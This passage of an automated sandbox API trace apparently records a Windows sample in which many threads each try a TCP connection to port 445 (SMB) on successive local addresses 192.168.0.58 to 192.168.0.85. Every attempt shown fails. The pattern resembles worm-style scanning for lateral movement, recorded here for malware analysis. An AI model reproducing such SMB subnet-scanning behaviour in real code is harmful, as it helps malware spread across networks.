0x28d7e40 [0143.520] wcslen (_String="192.168.0.58") returned 0xc [0143.520] wcstombs (in: _Dest=0x28cce20, _Source="192.168.0.58", _MaxCount=0xd | out: _Dest="192.168.0.58") returned 0xc [0143.520] htons (hostshort=0x1bd) returned 0xbd01 [0143.520] inet_addr (cp="192.168.0.58") returned 0x3a00a8c0 [0143.520] socket (af=2, type=1, protocol=0) returned 0x6d8 [0143.520] connect (s=0x6d8, name=0xaf7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.58"), namelen=16) returned -1 [0164.929] GetCurrentThreadId () returned 0xa1c [0164.929] GetCurrentThreadId () returned 0xa1c [0164.929] longjmp () [0164.929] GetCurrentThreadId () returned 0xa1c [0164.929] CloseHandle (hObject=0x6c8) returned 1 [0164.930] GetCurrentThreadId () returned 0xa1c [0164.930] Sleep (dwMilliseconds=0x0) [0164.957] _endthreadex (_ReturnCode=0x0) Thread: id = 855 os_tid = 0xaf4 [0143.522] GetCurrentThreadId () returned 0xaf4 [0143.522] GetCurrentThreadId () returned 0xaf4 [0143.522] GetCurrentThreadId () returned 0xaf4 [0143.522] _errno () returned 0x28d7150 [0143.522] wcslen (_String="192.168.0.59") returned 0xc [0143.522] wcstombs (in: _Dest=0x28cde28, _Source="192.168.0.59", _MaxCount=0xd | out: _Dest="192.168.0.59") returned 0xc [0143.522] htons (hostshort=0x1bd) returned 0xbd01 [0143.522] inet_addr (cp="192.168.0.59") returned 0x3b00a8c0 [0143.522] socket (af=2, type=1, protocol=0) returned 0x6ec [0143.522] connect (s=0x6ec, name=0xb1bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.59"), namelen=16) returned -1 [0164.930] GetCurrentThreadId () returned 0xaf4 [0164.930] GetCurrentThreadId () returned 0xaf4 [0164.930] longjmp () [0164.930] GetCurrentThreadId () returned 0xaf4 [0164.930] CloseHandle (hObject=0x6dc) returned 1 [0164.930] GetCurrentThreadId () returned 0xaf4 [0164.930] Sleep (dwMilliseconds=0x0) [0164.957] _endthreadex (_ReturnCode=0x0) Thread: id = 856 os_tid = 0x350 [0143.523] GetCurrentThreadId () returned 0x350 [0143.523] GetCurrentThreadId () returned 0x350 [0143.523] GetCurrentThreadId () returned 0x350 [0143.523] _errno () returned 0x28d77c8 [0143.523] wcslen (_String="192.168.0.60") returned 0xc [0143.523] wcstombs (in: _Dest=0x28d1e48, _Source="192.168.0.60", _MaxCount=0xd | out: _Dest="192.168.0.60") returned 0xc [0143.523] htons (hostshort=0x1bd) returned 0xbd01 [0143.523] inet_addr (cp="192.168.0.60") returned 0x3c00a8c0 [0143.523] socket (af=2, type=1, protocol=0) returned 0x700 [0143.523] connect (s=0x700, name=0xb3ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.60"), namelen=16) returned -1 [0164.930] GetCurrentThreadId () returned 0x350 [0164.930] GetCurrentThreadId () returned 0x350 [0164.930] longjmp () [0164.930] GetCurrentThreadId () returned 0x350 [0164.930] CloseHandle (hObject=0x6f0) returned 1 [0164.930] GetCurrentThreadId () returned 0x350 [0164.930] Sleep (dwMilliseconds=0x0) [0164.958] _endthreadex (_ReturnCode=0x0) Thread: id = 857 os_tid = 0xee4 [0143.554] GetCurrentThreadId () returned 0xee4 [0143.554] GetCurrentThreadId () returned 0xee4 [0143.554] GetCurrentThreadId () returned 0xee4 [0143.554] _errno () returned 0x28d8068 [0143.554] wcslen (_String="192.168.0.61") returned 0xc [0143.554] wcstombs (in: _Dest=0x28cee30, _Source="192.168.0.61", _MaxCount=0xd | out: _Dest="192.168.0.61") returned 0xc [0143.554] htons (hostshort=0x1bd) returned 0xbd01 [0143.554] inet_addr (cp="192.168.0.61") returned 0x3d00a8c0 [0143.554] socket (af=2, type=1, protocol=0) returned 0x710 [0143.555] connect (s=0x710, name=0xb63fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.61"), namelen=16) returned -1 [0164.930] GetCurrentThreadId () returned 0xee4 [0164.930] GetCurrentThreadId () returned 0xee4 [0164.930] longjmp () [0164.930] GetCurrentThreadId () returned 0xee4 [0164.930] CloseHandle (hObject=0x704) returned 1 [0164.930] GetCurrentThreadId () returned 0xee4 [0164.930] Sleep (dwMilliseconds=0x0) [0164.958] _endthreadex (_ReturnCode=0x0) Thread: id = 858 os_tid = 0xd2c [0143.556] GetCurrentThreadId () returned 0xd2c [0143.556] GetCurrentThreadId () returned 0xd2c [0143.556] GetCurrentThreadId () returned 0xd2c [0143.556] _errno () returned 0x28d8290 [0143.556] wcslen (_String="192.168.0.62") returned 0xc [0143.556] wcstombs (in: _Dest=0x28cfe38, _Source="192.168.0.62", _MaxCount=0xd | out: _Dest="192.168.0.62") returned 0xc [0143.556] htons (hostshort=0x1bd) returned 0xbd01 [0143.556] inet_addr (cp="192.168.0.62") returned 0x3e00a8c0 [0143.556] socket (af=2, type=1, protocol=0) returned 0x724 [0143.556] connect (s=0x724, name=0xb87fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.62"), namelen=16) returned -1 [0164.930] GetCurrentThreadId () returned 0xd2c [0164.930] GetCurrentThreadId () returned 0xd2c [0164.930] longjmp () [0164.930] GetCurrentThreadId () returned 0xd2c [0164.930] CloseHandle (hObject=0x714) returned 1 [0164.930] GetCurrentThreadId () returned 0xd2c [0164.930] Sleep (dwMilliseconds=0x0) [0164.959] _endthreadex (_ReturnCode=0x0) Thread: id = 859 os_tid = 0xd28 [0143.558] GetCurrentThreadId () returned 0xd28 [0143.558] GetCurrentThreadId () returned 0xd28 [0143.558] GetCurrentThreadId () returned 0xd28 [0143.558] _errno () returned 0x28d86e0 [0143.558] wcslen (_String="192.168.0.63") returned 0xc [0143.558] wcstombs (in: _Dest=0x28d0e40, _Source="192.168.0.63", _MaxCount=0xd | out: _Dest="192.168.0.63") returned 0xc [0143.558] htons (hostshort=0x1bd) returned 0xbd01 [0143.558] inet_addr (cp="192.168.0.63") returned 0x3f00a8c0 [0143.558] socket (af=2, type=1, protocol=0) returned 0x738 [0143.558] connect (s=0x738, name=0xbabfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.63"), namelen=16) returned -1 [0164.931] GetCurrentThreadId () returned 0xd28 [0164.931] GetCurrentThreadId () returned 0xd28 [0164.931] longjmp () [0164.931] GetCurrentThreadId () returned 0xd28 [0164.931] CloseHandle (hObject=0x728) returned 1 [0164.931] GetCurrentThreadId () returned 0xd28 [0164.931] Sleep (dwMilliseconds=0x0) [0164.959] _endthreadex (_ReturnCode=0x0) Thread: id = 860 os_tid = 0xe20 [0143.559] GetCurrentThreadId () returned 0xe20 [0143.559] GetCurrentThreadId () returned 0xe20 [0143.559] GetCurrentThreadId () returned 0xe20 [0143.560] _errno () returned 0x28d84b8 [0143.561] wcslen (_String="192.168.0.64") returned 0xc [0143.561] wcstombs (in: _Dest=0x28e0358, _Source="192.168.0.64", _MaxCount=0xd | out: _Dest="192.168.0.64") returned 0xc [0143.561] htons (hostshort=0x1bd) returned 0xbd01 [0143.561] inet_addr (cp="192.168.0.64") returned 0x4000a8c0 [0143.561] socket (af=2, type=1, protocol=0) returned 0x74c [0143.561] connect (s=0x74c, name=0xbcffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.64"), namelen=16) returned -1 [0164.931] GetCurrentThreadId () returned 0xe20 [0164.931] GetCurrentThreadId () returned 0xe20 [0164.931] longjmp () [0164.931] GetCurrentThreadId () returned 0xe20 [0164.931] CloseHandle (hObject=0x73c) returned 1 [0164.931] GetCurrentThreadId () returned 0xe20 [0164.931] Sleep (dwMilliseconds=0x0) [0164.960] _endthreadex (_ReturnCode=0x0) Thread: id = 861 os_tid = 0xf3c [0143.562] GetCurrentThreadId () returned 0xf3c [0143.562] GetCurrentThreadId () returned 0xf3c [0143.562] GetCurrentThreadId () returned 0xf3c [0143.562] _errno () returned 0x28d75a0 [0143.562] wcslen (_String="192.168.0.65") returned 0xc [0143.562] wcstombs (in: _Dest=0x28d9320, _Source="192.168.0.65", _MaxCount=0xd | out: _Dest="192.168.0.65") returned 0xc [0143.562] htons (hostshort=0x1bd) returned 0xbd01 [0143.563] inet_addr (cp="192.168.0.65") returned 0x4100a8c0 [0143.563] socket (af=2, type=1, protocol=0) returned 0x760 [0143.563] connect (s=0x760, name=0xbf3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.65"), namelen=16) returned -1 [0164.931] GetCurrentThreadId () returned 0xf3c [0164.931] GetCurrentThreadId () returned 0xf3c [0164.931] longjmp () [0164.931] GetCurrentThreadId () returned 0xf3c [0164.931] CloseHandle (hObject=0x750) returned 1 [0164.931] GetCurrentThreadId () returned 0xf3c [0164.931] Sleep (dwMilliseconds=0x0) [0164.961] _endthreadex (_ReturnCode=0x0) Thread: id = 862 os_tid = 0xeec [0143.565] GetCurrentThreadId () returned 0xeec [0143.565] GetCurrentThreadId () returned 0xeec [0143.565] GetCurrentThreadId () returned 0xeec [0143.565] _errno () returned 0x28d8908 [0143.565] wcslen (_String="192.168.0.66") returned 0xc [0143.565] wcstombs (in: _Dest=0x28de348, _Source="192.168.0.66", _MaxCount=0xd | out: _Dest="192.168.0.66") returned 0xc [0143.565] htons (hostshort=0x1bd) returned 0xbd01 [0143.565] inet_addr (cp="192.168.0.66") returned 0x4200a8c0 [0143.565] socket (af=2, type=1, protocol=0) returned 0x774 [0143.565] connect (s=0x774, name=0xc17fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.66"), namelen=16) returned -1 [0164.931] GetCurrentThreadId () returned 0xeec [0164.931] GetCurrentThreadId () returned 0xeec [0164.931] longjmp () [0164.931] GetCurrentThreadId () returned 0xeec [0164.931] CloseHandle (hObject=0x764) returned 1 [0164.931] GetCurrentThreadId () returned 0xeec [0164.931] Sleep (dwMilliseconds=0x0) [0164.961] _endthreadex (_ReturnCode=0x0) Thread: id = 863 os_tid = 0xf24 [0143.567] GetCurrentThreadId () returned 0xf24 [0143.567] GetCurrentThreadId () returned 0xf24 [0143.567] GetCurrentThreadId () returned 0xf24 [0143.567] _errno () returned 0x28d8d58 [0143.567] wcslen (_String="192.168.0.67") returned 0xc [0143.567] wcstombs (in: _Dest=0x28df350, _Source="192.168.0.67", _MaxCount=0xd | out: _Dest="192.168.0.67") returned 0xc [0143.568] htons (hostshort=0x1bd) returned 0xbd01 [0143.568] inet_addr (cp="192.168.0.67") returned 0x4300a8c0 [0143.568] socket (af=2, type=1, protocol=0) returned 0x78c [0143.569] connect (s=0x78c, name=0xc3bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.67"), namelen=16) returned -1 [0164.931] GetCurrentThreadId () returned 0xf24 [0164.931] GetCurrentThreadId () returned 0xf24 [0164.931] longjmp () [0164.932] GetCurrentThreadId () returned 0xf24 [0164.932] CloseHandle (hObject=0x778) returned 1 [0164.932] GetCurrentThreadId () returned 0xf24 [0164.932] Sleep (dwMilliseconds=0x0) [0164.962] _endthreadex (_ReturnCode=0x0) Thread: id = 864 os_tid = 0xf34 [0143.574] GetCurrentThreadId () returned 0xf34 [0143.574] GetCurrentThreadId () returned 0xf34 [0143.575] GetCurrentThreadId () returned 0xf34 [0143.575] _errno () returned 0x28d8b30 [0143.575] wcslen (_String="192.168.0.68") returned 0xc [0143.575] wcstombs (in: _Dest=0x28e1360, _Source="192.168.0.68", _MaxCount=0xd | out: _Dest="192.168.0.68") returned 0xc [0143.575] htons (hostshort=0x1bd) returned 0xbd01 [0143.575] inet_addr (cp="192.168.0.68") returned 0x4400a8c0 [0143.575] socket (af=2, type=1, protocol=0) returned 0x7a0 [0143.575] connect (s=0x7a0, name=0xc5ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.68"), namelen=16) returned -1 [0164.932] GetCurrentThreadId () returned 0xf34 [0164.932] GetCurrentThreadId () returned 0xf34 [0164.932] longjmp () [0164.932] GetCurrentThreadId () returned 0xf34 [0164.932] CloseHandle (hObject=0x790) returned 1 [0164.932] GetCurrentThreadId () returned 0xf34 [0164.932] Sleep (dwMilliseconds=0x0) [0164.962] _endthreadex (_ReturnCode=0x0) Thread: id = 865 os_tid = 0xef4 [0143.576] GetCurrentThreadId () returned 0xef4 [0143.576] GetCurrentThreadId () returned 0xef4 [0143.576] GetCurrentThreadId () returned 0xef4 [0143.576] _errno () returned 0x28d8f80 [0143.576] wcslen (_String="192.168.0.69") returned 0xc [0143.576] wcstombs (in: _Dest=0x28da328, _Source="192.168.0.69", _MaxCount=0xd | out: _Dest="192.168.0.69") returned 0xc [0143.576] htons (hostshort=0x1bd) returned 0xbd01 [0143.576] inet_addr (cp="192.168.0.69") returned 0x4500a8c0 [0143.576] socket (af=2, type=1, protocol=0) returned 0x7b4 [0143.577] connect (s=0x7b4, name=0xc83fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.69"), namelen=16) returned -1 [0164.932] GetCurrentThreadId () returned 0xef4 [0164.932] GetCurrentThreadId () returned 0xef4 [0164.932] longjmp () [0164.932] GetCurrentThreadId () returned 0xef4 [0164.932] CloseHandle (hObject=0x7a4) returned 1 [0164.932] GetCurrentThreadId () returned 0xef4 [0164.932] Sleep (dwMilliseconds=0x0) [0164.963] _endthreadex (_ReturnCode=0x0) Thread: id = 866 os_tid = 0xf50 [0143.578] GetCurrentThreadId () returned 0xf50 [0143.578] GetCurrentThreadId () returned 0xf50 [0143.578] GetCurrentThreadId () returned 0xf50 [0143.578] _errno () returned 0x28d5548 [0143.578] wcslen (_String="192.168.0.70") returned 0xc [0143.578] wcstombs (in: _Dest=0x28e2368, _Source="192.168.0.70", _MaxCount=0xd | out: _Dest="192.168.0.70") returned 0xc [0143.578] htons (hostshort=0x1bd) returned 0xbd01 [0143.578] inet_addr (cp="192.168.0.70") returned 0x4600a8c0 [0143.578] socket (af=2, type=1, protocol=0) returned 0x7c8 [0143.578] connect (s=0x7c8, name=0xca7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.70"), namelen=16) returned -1 [0164.932] GetCurrentThreadId () returned 0xf50 [0164.932] GetCurrentThreadId () returned 0xf50 [0164.932] longjmp () [0164.932] GetCurrentThreadId () returned 0xf50 [0164.932] CloseHandle (hObject=0x7b8) returned 1 [0164.932] GetCurrentThreadId () returned 0xf50 [0164.932] Sleep (dwMilliseconds=0x0) [0164.963] _endthreadex (_ReturnCode=0x0) Thread: id = 867 os_tid = 0xf44 [0143.579] GetCurrentThreadId () returned 0xf44 [0143.580] GetCurrentThreadId () returned 0xf44 [0143.580] GetCurrentThreadId () returned 0xf44 [0143.580] _errno () returned 0x28d5770 [0143.580] wcslen (_String="192.168.0.71") returned 0xc [0143.580] wcstombs (in: _Dest=0x28db330, _Source="192.168.0.71", _MaxCount=0xd | out: _Dest="192.168.0.71") returned 0xc [0143.580] htons (hostshort=0x1bd) returned 0xbd01 [0143.580] inet_addr (cp="192.168.0.71") returned 0x4700a8c0 [0143.580] socket (af=2, type=1, protocol=0) returned 0x7dc [0143.580] connect (s=0x7dc, name=0xccbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.71"), namelen=16) returned -1 [0164.932] GetCurrentThreadId () returned 0xf44 [0164.932] GetCurrentThreadId () returned 0xf44 [0164.932] longjmp () [0164.932] GetCurrentThreadId () returned 0xf44 [0164.932] CloseHandle (hObject=0x7cc) returned 1 [0164.932] GetCurrentThreadId () returned 0xf44 [0164.932] Sleep (dwMilliseconds=0x0) [0164.964] _endthreadex (_ReturnCode=0x0) Thread: id = 868 os_tid = 0xddc [0143.581] GetCurrentThreadId () returned 0xddc [0143.581] GetCurrentThreadId () returned 0xddc [0143.581] GetCurrentThreadId () returned 0xddc [0143.581] _errno () returned 0x28d5998 [0143.581] wcslen (_String="192.168.0.72") returned 0xc [0143.581] wcstombs (in: _Dest=0x28e3370, _Source="192.168.0.72", _MaxCount=0xd | out: _Dest="192.168.0.72") returned 0xc [0143.581] htons (hostshort=0x1bd) returned 0xbd01 [0143.581] inet_addr (cp="192.168.0.72") returned 0x4800a8c0 [0143.581] socket (af=2, type=1, protocol=0) returned 0x7f0 [0143.582] connect (s=0x7f0, name=0xceffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.72"), namelen=16) returned -1 [0164.933] GetCurrentThreadId () returned 0xddc [0164.933] GetCurrentThreadId () returned 0xddc [0164.933] longjmp () [0164.933] GetCurrentThreadId () returned 0xddc [0164.933] CloseHandle (hObject=0x7e0) returned 1 [0164.933] GetCurrentThreadId () returned 0xddc [0164.933] Sleep (dwMilliseconds=0x0) [0164.965] _endthreadex (_ReturnCode=0x0) Thread: id = 869 os_tid = 0xef8 [0143.583] GetCurrentThreadId () returned 0xef8 [0143.583] GetCurrentThreadId () returned 0xef8 [0143.583] GetCurrentThreadId () returned 0xef8 [0143.583] _errno () returned 0x28d5320 [0143.583] wcslen (_String="192.168.0.73") returned 0xc [0143.583] wcstombs (in: _Dest=0x28dc338, _Source="192.168.0.73", _MaxCount=0xd | out: _Dest="192.168.0.73") returned 0xc [0143.583] htons (hostshort=0x1bd) returned 0xbd01 [0143.583] inet_addr (cp="192.168.0.73") returned 0x4900a8c0 [0143.583] socket (af=2, type=1, protocol=0) returned 0x808 [0143.583] connect (s=0x808, name=0xd13fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.73"), namelen=16) returned -1 [0164.933] GetCurrentThreadId () returned 0xef8 [0164.933] GetCurrentThreadId () returned 0xef8 [0164.933] longjmp () [0164.933] GetCurrentThreadId () returned 0xef8 [0164.933] CloseHandle (hObject=0x7f4) returned 1 [0164.933] GetCurrentThreadId () returned 0xef8 [0164.933] Sleep (dwMilliseconds=0x0) [0164.965] _endthreadex (_ReturnCode=0x0) Thread: id = 870 os_tid = 0xf2c [0143.584] GetCurrentThreadId () returned 0xf2c [0143.584] GetCurrentThreadId () returned 0xf2c [0143.584] GetCurrentThreadId () returned 0xf2c [0143.585] _errno () returned 0x28d5de8 [0143.585] wcslen (_String="192.168.0.74") returned 0xc [0143.585] wcstombs (in: _Dest=0x28e4378, _Source="192.168.0.74", _MaxCount=0xd | out: _Dest="192.168.0.74") returned 0xc [0143.585] htons (hostshort=0x1bd) returned 0xbd01 [0143.585] inet_addr (cp="192.168.0.74") returned 0x4a00a8c0 [0143.585] socket (af=2, type=1, protocol=0) returned 0x81c [0143.585] connect (s=0x81c, name=0xd37fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.74"), namelen=16) returned -1 [0164.933] GetCurrentThreadId () returned 0xf2c [0164.933] GetCurrentThreadId () returned 0xf2c [0164.933] longjmp () [0164.933] GetCurrentThreadId () returned 0xf2c [0164.933] CloseHandle (hObject=0x80c) returned 1 [0164.933] GetCurrentThreadId () returned 0xf2c [0164.933] Sleep (dwMilliseconds=0x0) [0164.966] _endthreadex (_ReturnCode=0x0) Thread: id = 871 os_tid = 0xde4 [0143.587] GetCurrentThreadId () returned 0xde4 [0143.587] GetCurrentThreadId () returned 0xde4 [0143.587] GetCurrentThreadId () returned 0xde4 [0143.587] _errno () returned 0x28d6010 [0143.587] wcslen (_String="192.168.0.76") returned 0xc [0143.587] wcstombs (in: _Dest=0x28dd340, _Source="192.168.0.76", _MaxCount=0xd | out: _Dest="192.168.0.76") returned 0xc [0143.587] htons (hostshort=0x1bd) returned 0xbd01 [0143.587] inet_addr (cp="192.168.0.76") returned 0x4c00a8c0 [0143.587] socket (af=2, type=1, protocol=0) returned 0x830 [0143.587] connect (s=0x830, name=0xd5bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.76"), namelen=16) returned -1 [0164.933] GetCurrentThreadId () returned 0xde4 [0164.933] GetCurrentThreadId () returned 0xde4 [0164.933] longjmp () [0164.933] GetCurrentThreadId () returned 0xde4 [0164.933] CloseHandle (hObject=0x820) returned 1 [0164.933] GetCurrentThreadId () returned 0xde4 [0164.933] Sleep (dwMilliseconds=0x0) [0164.966] _endthreadex (_ReturnCode=0x0) Thread: id = 872 os_tid = 0xf40 [0143.589] GetCurrentThreadId () returned 0xf40 [0143.589] GetCurrentThreadId () returned 0xf40 [0143.589] GetCurrentThreadId () returned 0xf40 [0143.589] _errno () returned 0x28d6238 [0143.589] wcslen (_String="192.168.0.77") returned 0xc [0143.589] wcstombs (in: _Dest=0x28ea3a8, _Source="192.168.0.77", _MaxCount=0xd | out: _Dest="192.168.0.77") returned 0xc [0143.589] htons (hostshort=0x1bd) returned 0xbd01 [0143.589] inet_addr (cp="192.168.0.77") returned 0x4d00a8c0 [0143.589] socket (af=2, type=1, protocol=0) returned 0x844 [0143.589] connect (s=0x844, name=0xd7ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.77"), namelen=16) returned -1 [0164.933] GetCurrentThreadId () returned 0xf40 [0164.933] GetCurrentThreadId () returned 0xf40 [0164.934] longjmp () [0164.934] GetCurrentThreadId () returned 0xf40 [0164.934] CloseHandle (hObject=0x834) returned 1 [0164.934] GetCurrentThreadId () returned 0xf40 [0164.934] Sleep (dwMilliseconds=0x0) [0164.967] _endthreadex (_ReturnCode=0x0) Thread: id = 873 os_tid = 0xa5c [0143.590] GetCurrentThreadId () returned 0xa5c [0143.591] GetCurrentThreadId () returned 0xa5c [0143.591] GetCurrentThreadId () returned 0xa5c [0143.591] _errno () returned 0x28d6460 [0143.591] wcslen (_String="192.168.0.78") returned 0xc [0143.591] wcstombs (in: _Dest=0x28eb3b0, _Source="192.168.0.78", _MaxCount=0xd | out: _Dest="192.168.0.78") returned 0xc [0143.591] htons (hostshort=0x1bd) returned 0xbd01 [0143.591] inet_addr (cp="192.168.0.78") returned 0x4e00a8c0 [0143.591] socket (af=2, type=1, protocol=0) returned 0x858 [0143.591] connect (s=0x858, name=0xda3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.78"), namelen=16) returned -1 [0164.934] GetCurrentThreadId () returned 0xa5c [0164.934] GetCurrentThreadId () returned 0xa5c [0164.934] longjmp () [0164.934] GetCurrentThreadId () returned 0xa5c [0164.934] CloseHandle (hObject=0x848) returned 1 [0164.934] GetCurrentThreadId () returned 0xa5c [0164.934] Sleep (dwMilliseconds=0x0) [0164.967] _endthreadex (_ReturnCode=0x0) Thread: id = 874 os_tid = 0xf38 [0143.593] GetCurrentThreadId () returned 0xf38 [0143.593] GetCurrentThreadId () returned 0xf38 [0143.593] GetCurrentThreadId () returned 0xf38 [0143.593] _errno () returned 0x28d5bc0 [0143.593] wcslen (_String="192.168.0.79") returned 0xc [0143.593] wcstombs (in: _Dest=0x28e7390, _Source="192.168.0.79", _MaxCount=0xd | out: _Dest="192.168.0.79") returned 0xc [0143.593] htons (hostshort=0x1bd) returned 0xbd01 [0143.593] inet_addr (cp="192.168.0.79") returned 0x4f00a8c0 [0143.593] socket (af=2, type=1, protocol=0) returned 0x86c [0143.593] connect (s=0x86c, name=0xdc7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.79"), namelen=16) returned -1 [0164.934] GetCurrentThreadId () returned 0xf38 [0164.934] GetCurrentThreadId () returned 0xf38 [0164.934] longjmp () [0164.934] GetCurrentThreadId () returned 0xf38 [0164.934] CloseHandle (hObject=0x85c) returned 1 [0164.934] GetCurrentThreadId () returned 0xf38 [0164.934] Sleep (dwMilliseconds=0x0) [0164.968] _endthreadex (_ReturnCode=0x0) Thread: id = 875 os_tid = 0xa78 [0143.595] GetCurrentThreadId () returned 0xa78 [0143.595] GetCurrentThreadId () returned 0xa78 [0143.595] GetCurrentThreadId () returned 0xa78 [0143.595] _errno () returned 0x28d68b0 [0143.595] wcslen (_String="192.168.0.80") returned 0xc [0143.595] wcstombs (in: _Dest=0x28e8398, _Source="192.168.0.80", _MaxCount=0xd | out: _Dest="192.168.0.80") returned 0xc [0143.595] htons (hostshort=0x1bd) returned 0xbd01 [0143.595] inet_addr (cp="192.168.0.80") returned 0x5000a8c0 [0143.595] socket (af=2, type=1, protocol=0) returned 0x880 [0143.595] connect (s=0x880, name=0xdebfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.80"), namelen=16) returned -1 [0164.934] GetCurrentThreadId () returned 0xa78 [0164.934] GetCurrentThreadId () returned 0xa78 [0164.934] longjmp () [0164.934] GetCurrentThreadId () returned 0xa78 [0164.934] CloseHandle (hObject=0x870) returned 1 [0164.934] GetCurrentThreadId () returned 0xa78 [0164.934] Sleep (dwMilliseconds=0x0) [0164.968] _endthreadex (_ReturnCode=0x0) Thread: id = 876 os_tid = 0xa60 [0143.648] GetCurrentThreadId () returned 0xa60 [0143.648] GetCurrentThreadId () returned 0xa60 [0143.648] GetCurrentThreadId () returned 0xa60 [0143.648] _errno () returned 0x28d6ad8 [0143.648] wcslen (_String="192.168.0.81") returned 0xc [0143.648] wcstombs (in: _Dest=0x28e93a0, _Source="192.168.0.81", _MaxCount=0xd | out: _Dest="192.168.0.81") returned 0xc [0143.648] htons (hostshort=0x1bd) returned 0xbd01 [0143.648] inet_addr (cp="192.168.0.81") returned 0x5100a8c0 [0143.648] socket (af=2, type=1, protocol=0) returned 0x894 [0143.649] connect (s=0x894, name=0xe0ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.81"), namelen=16) returned -1 [0164.934] GetCurrentThreadId () returned 0xa60 [0164.934] GetCurrentThreadId () returned 0xa60 [0164.934] longjmp () [0164.934] GetCurrentThreadId () returned 0xa60 [0164.934] CloseHandle (hObject=0x884) returned 1 [0164.935] GetCurrentThreadId () returned 0xa60 [0164.935] Sleep (dwMilliseconds=0x0) [0164.969] _endthreadex (_ReturnCode=0x0) Thread: id = 877 os_tid = 0xf60 [0143.655] GetCurrentThreadId () returned 0xf60 [0143.655] GetCurrentThreadId () returned 0xf60 [0143.655] GetCurrentThreadId () returned 0xf60 [0143.655] _errno () returned 0x28d6d00 [0143.655] wcslen (_String="192.168.0.82") returned 0xc [0143.655] wcstombs (in: _Dest=0x28ec3b8, _Source="192.168.0.82", _MaxCount=0xd | out: _Dest="192.168.0.82") returned 0xc [0143.655] htons (hostshort=0x1bd) returned 0xbd01 [0143.655] inet_addr (cp="192.168.0.82") returned 0x5200a8c0 [0143.655] socket (af=2, type=1, protocol=0) returned 0x8a8 [0143.655] connect (s=0x8a8, name=0xe33fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.82"), namelen=16) returned -1 [0164.935] GetCurrentThreadId () returned 0xf60 [0164.935] GetCurrentThreadId () returned 0xf60 [0164.935] longjmp () [0164.935] GetCurrentThreadId () returned 0xf60 [0164.935] CloseHandle (hObject=0x898) returned 1 [0164.935] GetCurrentThreadId () returned 0xf60 [0164.935] Sleep (dwMilliseconds=0x0) [0164.969] _endthreadex (_ReturnCode=0x0) Thread: id = 878 os_tid = 0x524 [0143.656] GetCurrentThreadId () returned 0x524 [0143.656] GetCurrentThreadId () returned 0x524 [0143.656] GetCurrentThreadId () returned 0x524 [0143.656] _errno () returned 0x28d6f28 [0143.656] wcslen (_String="192.168.0.83") returned 0xc [0143.656] wcstombs (in: _Dest=0x28e5380, _Source="192.168.0.83", _MaxCount=0xd | out: _Dest="192.168.0.83") returned 0xc [0143.657] htons (hostshort=0x1bd) returned 0xbd01 [0143.657] inet_addr (cp="192.168.0.83") returned 0x5300a8c0 [0143.657] socket (af=2, type=1, protocol=0) returned 0x8bc [0143.657] connect (s=0x8bc, name=0xe57fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.83"), namelen=16) returned -1 [0164.935] GetCurrentThreadId () returned 0x524 [0164.935] GetCurrentThreadId () returned 0x524 [0164.935] longjmp () [0164.935] GetCurrentThreadId () returned 0x524 [0164.935] CloseHandle (hObject=0x8ac) returned 1 [0164.935] GetCurrentThreadId () returned 0x524 [0164.935] Sleep (dwMilliseconds=0x0) [0164.970] _endthreadex (_ReturnCode=0x0) Thread: id = 879 os_tid = 0xf48 [0143.658] GetCurrentThreadId () returned 0xf48 [0143.658] GetCurrentThreadId () returned 0xf48 [0143.658] GetCurrentThreadId () returned 0xf48 [0143.658] _errno () returned 0x28d7378 [0143.658] wcslen (_String="192.168.0.84") returned 0xc [0143.658] wcstombs (in: _Dest=0x28ed3c0, _Source="192.168.0.84", _MaxCount=0xd | out: _Dest="192.168.0.84") returned 0xc [0143.658] htons (hostshort=0x1bd) returned 0xbd01 [0143.658] inet_addr (cp="192.168.0.84") returned 0x5400a8c0 [0143.658] socket (af=2, type=1, protocol=0) returned 0x8d0 [0143.658] connect (s=0x8d0, name=0xe7bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.84"), namelen=16) returned -1 [0164.935] GetCurrentThreadId () returned 0xf48 [0164.935] GetCurrentThreadId () returned 0xf48 [0164.935] longjmp () [0164.935] GetCurrentThreadId () returned 0xf48 [0164.935] CloseHandle (hObject=0x8c0) returned 1 [0164.935] GetCurrentThreadId () returned 0xf48 [0164.935] Sleep (dwMilliseconds=0x0) [0164.971] _endthreadex (_ReturnCode=0x0) Thread: id = 880 os_tid = 0xf20 [0143.660] GetCurrentThreadId () returned 0xf20 [0143.661] GetCurrentThreadId () returned 0xf20 [0143.661] GetCurrentThreadId () returned 0xf20 [0143.661] _errno () returned 0x28b2ef0 [0143.661] wcslen (_String="192.168.0.85") returned 0xc [0143.661] wcstombs (in: _Dest=0x28e6388, _Source="192.168.0.85", _MaxCount=0xd | out: _Dest="192.168.0.85") returned 0xc [0143.661] htons (hostshort=0x1bd) returned 0xbd01 [0143.661] inet_addr (cp="192.168.0.85") returned 0x5500a8c0 [0143.661] socket (af=2, type=1, protocol=0) returned 0x8e4 [0143.661] connect (s=0x8e4, name=0xe9ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.85"), namelen=16) returned -1 